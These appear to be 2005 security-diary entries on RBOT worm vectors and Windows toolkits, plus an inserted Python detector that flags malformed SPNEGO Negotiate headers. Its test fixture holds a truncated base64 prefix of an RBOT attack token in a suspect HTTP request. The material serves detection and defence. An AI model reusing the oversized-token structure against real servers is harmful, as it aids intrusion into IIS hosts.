http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FRBOT%2EBJF and http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FRBOT%2EBJI

On a similar note, we've had one report of what looks like another RBOT vector, this time SMB over HTTP. An IIS server will accept multiple forms of authentication, including (non-IIS folks cover your eyes, this will hurt) NTLM via base64 encoding. You looked....I warned you! Look for:

GET / HTTP/1.0
Host: xxx.xxx.xxx.xxx
Authorization: Negotiate

All that gibberish can be decoded with good ol' "mimencode -u" to reveal an RBOT tftp download command. The long and short of it is POLP - Principle of Least Privilege. Disable any authentication methods that are unnecessary, especially on your big-bad-world-facing servers. Me, I don't trust anyone to play nicely, inside or out.
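Two detections have been described for this traffic: the community Snort rule quoted in the June 5 entry, which fires on 1000 or more bytes after a colon in a header, and decoding the Negotiate token by hand. The added example below is my own code, not the diary's or Shirkdog's, and runs both over a raw request: the length check first, then a walk of the GSSAPI/SPNEGO structure (RFC 2743 InitialContextToken, RFC 4178 NegTokenInit) that reports declared ASN.1 lengths that cannot belong to a real negotiation, without ever executing anything it decodes. The suspect fixture takes the base64 prefix visible in the June 5 packet dump and extends it with the same repeating filler, cut short as a single captured packet would be; the benign fixture is a minimal, well-formed token constructed for contrast.

```python
import base64
import binascii

SPNEGO_OID = bytes.fromhex("2b0601050502")   # 1.3.6.1.5.5.2, the SPNEGO mechanism
LONG_HEADER_THRESHOLD = 1000                  # byte count the Snort pcre looks for after ':'


def read_tlv(buf: bytes, pos: int):
    """Read one BER tag and definite-form length at pos.
    Returns (tag, declared_length, value_start), or None if the header itself is cut
    off or uses the indefinite form."""
    if pos + 2 > len(buf):
        return None
    tag, first = buf[pos], buf[pos + 1]
    if first < 0x80:
        return tag, first, pos + 2
    n = first & 0x7F
    if n == 0 or pos + 2 + n > len(buf):
        return None
    return tag, int.from_bytes(buf[pos + 2:pos + 2 + n], "big"), pos + 2 + n


def long_header_values(raw: bytes) -> list:
    """The sid 100000122 logic: any header line with 1000+ bytes after the colon."""
    findings = []
    head = raw.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:
        name, sep, after = line.partition(b":")
        if sep and len(after) >= LONG_HEADER_THRESHOLD:
            findings.append(f"header {name.decode('latin-1')!r} carries {len(after)} bytes after the colon")
    return findings


def inspect_negotiate_token(b64: str) -> list:
    """Walk the SPNEGO token and report structure that does not fit a negotiation."""
    try:
        tok = base64.b64decode(b64 + "=" * (-len(b64) % 4))   # tolerate a cut-off capture
    except (binascii.Error, ValueError):
        return ["Negotiate token is not valid base64"]
    findings = []
    t = read_tlv(tok, 0)
    if t is None or t[0] != 0x60:
        return ["token does not start with an InitialContextToken (0x60)"]
    _, outer_len, pos = t
    if outer_len > len(tok) - pos:
        findings.append(f"token declares {outer_len} bytes but only {len(tok) - pos} are present (truncated or malformed)")
    t = read_tlv(tok, pos)
    if t is None or t[0] != 0x06:
        return findings + ["mechanism OID missing"]
    _, oid_len, pos = t
    if tok[pos:pos + oid_len] != SPNEGO_OID:
        findings.append(f"unexpected mechanism OID {tok[pos:pos + oid_len].hex()}")
    pos += oid_len
    t = read_tlv(tok, pos)                        # [0] NegTokenInit
    if t is None or t[0] != 0xA0:
        return findings + ["expected NegTokenInit [0] after the OID"]
    t = read_tlv(tok, t[2])                       # its SEQUENCE
    if t is None or t[0] != 0x30:
        return findings + ["NegTokenInit does not contain a SEQUENCE"]
    _, seq_len, pos = t
    end = min(pos + seq_len, len(tok))
    while pos < end:
        t = read_tlv(tok, pos)
        if t is None:
            findings.append("element header cut off inside NegTokenInit")
            break
        tag, length, pos = t
        if tag == 0xA1:                           # reqFlags: a ContextFlags BIT STRING, a few bytes
            if length > 8:
                findings.append(f"reqFlags declares {length} bytes; a ContextFlags BIT STRING is a few bytes")
            inner = read_tlv(tok, pos)
            if inner and inner[0] == 0x23:
                findings.append("reqFlags holds a constructed BIT STRING (0x23), which DER forbids")
        pos += length
    return findings


def analyze_request(raw: bytes) -> list:
    """Run both checks over one raw HTTP request; returns a list of finding strings."""
    findings = long_header_values(raw)
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "authorization" and value.strip().lower().startswith("negotiate"):
            parts = value.split(None, 1)
            findings.extend(inspect_negotiate_token(parts[1] if len(parts) > 1 else ""))
    return findings


# Constructed fixtures. TOKEN_PREFIX is the base64 visible at the start of the June 5
# packet dump; the filler repeats the dump's 'A' (0x41) run and stops early, as the
# single captured packet did. Host addresses are documentation addresses.
TOKEN_PREFIX = "YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEA"
SUSPECT_REQUEST = (
    b"GET / HTTP/1.0\r\nHost: 192.0.2.10\r\n"
    b"Authorization: Negotiate " + (TOKEN_PREFIX + "QUFB" * 300).encode() + b"\r\n\r\n"
)
BENIGN_TOKEN = base64.b64encode(bytes.fromhex("600e06062b0601050502a0043002a000")).decode()
BENIGN_REQUEST = b"GET / HTTP/1.0\r\nHost: 192.0.2.10\r\nAuthorization: Negotiate " + BENIGN_TOKEN.encode() + b"\r\n\r\n"

if __name__ == "__main__":
    for label, req in (("suspect", SUSPECT_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, analyze_request(req) or "no findings")
```

The structural checks are what the length-only rule cannot give you: a legitimate Negotiate header from a browser is a few hundred bytes at most and its reqFlags element, when present, is a four-byte bit string, so a token whose flags field claims kilobytes is worth an alert on its own even when the packet is too short for the Snort pcre to match.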




Published: 2005-06-02

More tools, Google summer of code

More tools added

Many readers, and fellow handlers, have chimed in to add to the listing
of tools submitted by ScottF in yesterday's diary. I'll be listing them
here, and will find a more permanent home for the full compilation.
Updates will be posted throughout the remainder of my shift.

I personally have a preference for tools that are free, and open source.
Although I'll certainly take just free.

Here are my contributions:

Contributed by Harlan Carvey:

Contributed by Greg:

Contributed by Brian Patterson:

Contributed by John Franolich:

Root Kit Revealer.

Contributed by ScottF:

Contributed by Shaun Brachmann:

Contributed by Kahlib:

Contributed by Alpha:

Contributed by Steve Kiehl:

Google summer of code

Students can get paid to develop or contribute to open source software projects this summer, including nmap.


Want to write open source this summer? Want to make money? Want to do both?

My apologies to those whose tool submissions did not get included this time around. There were many, and they were all good. I had to cut it off somewhere.




Published: 2005-06-01

Quiet Day; U.S. CERT Summary; Scott's Toolkit for Windows

Quiet Day

This has been a really quiet day on the Net. Probably just as well, it has given this Handler some time to reflect on what I see going on out in the black hole we call the World Wide Web and think about how things have changed in the last 12 months or so. It never ceases to amaze me how incredibly intuitive our own Dr J. (Johannes U.) is. About a year ago I had a "discussion" with Johannes via email. I was in the process of developing a PowerPoint presentation for a workshop that I was giving on the Internet and its perils. One of the questions that I presented to Johannes was – If you could look to the future what do you think will be the biggest problem facing the Net in the next year or two. His answer to me at the time was “Botnets”. At the time I was surprised because I really hadn’t talked to anyone or worked with any computers that had been affected by “bots”. Ironically – just a few months later I now fully agree with the good “Dr. J”. I have dealt with so many computers in the last 9 months that are riddled with the little devils that I am beginning now to wonder if any computers exist that don’t have “bots”.

I haven’t had a chance to ask Johannes to answer that question again. I wonder if his answer will change. Humm!

Now how about you? What do you think will be the big problems in the summer of 2006? Maybe I will compile your replies and post them on June 1 of 2006. What do you think?

U.S. CERT Summary of Security Items from May 25 through May 31, 2005

U.S. CERT has released their summary. I find the number of new vulnerabilities and updates to old vulnerabilities it identifies quite interesting. Make sure that you get your systems patched, plugged or whatever it is that the manufacturer recommends. We don't want any of you, our faithful readers, to fall to the devious hackers lurking out on the WWW.

Scott's Toolkit for Windows

A big thank you to one of our Handlers - Scott F - for providing us with his toolkit recommendations. This toolkit looks like it will provide you with everything you will need to monitor, troubleshoot and maintain your network.

If you have other windows based tools that you keep in your personal toolkit, please let us know through our .

Antivirus Tools
|-- McAfee Stinger (updated routinely)
|-- Symantec AV Corporate Edition v9 (soon to be v10)
|-- Microsoft Malware Removal Tool (released monthly)
|-- Current Symantec AV Intelligent Updater

|-- NetCat (available now at SecurityFocus)
|-- SysInternals AccessEnum
|-- SysInternals AutoRuns
|-- SysInternals Contig
|-- SysInternals DiskView
|-- SysInternals FileMon
|-- SysInternals ListDLLs
|-- SysInternals Page Defrag
|-- SysInternals ProcessExplorer
|-- SysInternals PS Tools
|-- SysInternals RegMon
|-- SysInternals Rootkit Revealer
|-- SysInternals Sdelete
|-- SysInternals ShareEnum
|-- SysInternals Sync
|-- SysInternals TCPView
|-- SysInternals Miscellaneous tools
|-- Heysoft LADS
|-- myNetWatchman SecCheck
|-- Inetcat.org NBTScan
|-- FoundStone BinText
|-- FoundStone Forensic Toolkit
|-- FoundStone Fport
|-- FoundStone Galleta
|-- FoundStone Pasco
|-- FoundStone Rifiuti
|-- FoundStone Vision
|-- FoundStone ShoWin
|-- FoundStone SuperScan
|-- WinDump
|-- Nmap
|-- Tigerteam.se SBD (encrypted netcat)
|-- GNU based unxutils (from unixutils.sourceforge.net)
|-- Good copies of windows binaries (netstat, cmd, ipconfig, nbtstat)

Spyware Tools
|-- AdAware (updated defs in same directory)
|-- CWShredder
|-- Hijack This
|-- MS AntiSpyWare Beta
|-- Spybot Search and Destroy (updated defs in same directory)
|-- BHO Demon

Security Tools (this is my usual place to dump the .zip or .exe installers)
|-- Heysoft LADS (list alternate data streams)
|-- Inetcat.org NBTScan
|-- MS Baseline Security Analyzer
|-- MS IIS Lockdown tool
|-- Sam Spade
|-- SSH Client (SSH.com or Putty)
|-- SysInternals Tools
|-- Foundstone Tools
|-- BlackIce PC Protection
|-- Kerio Personal Firewall
|-- Zone Alarm Personal Firewall
|-- WinPcap
|-- WinDump
|-- Ethereal Installer
|-- Nmap for windows (cli version)

|-- Adobe Acrobat Reader Installer
|-- CPU-Z
|-- FireFox Installer
|-- Macromedia Flash and ShockWave Installers
|-- Quicktime Standalone Installer
|-- VNC Installer
|-- Winzip Installer
|-- ISCAlert

Service Packs ( on a 2nd CD )
|-- Windows XP SP2
|-- Windows 2000 SP4 (+rpc/lsass critical patches or SRP when released)
|-- Windows 2003 Server SP1

(Some additional CDs I keep around for the Unix geek in me)

Knoppix CD

Helix CD

Note: Any commercial software above that is not freeware/shareware in the list above should be replaced in your toolkit with your company or campus licensed software.

Here is wishing all of you a Good Night.

Deb Hale

Handler On Duty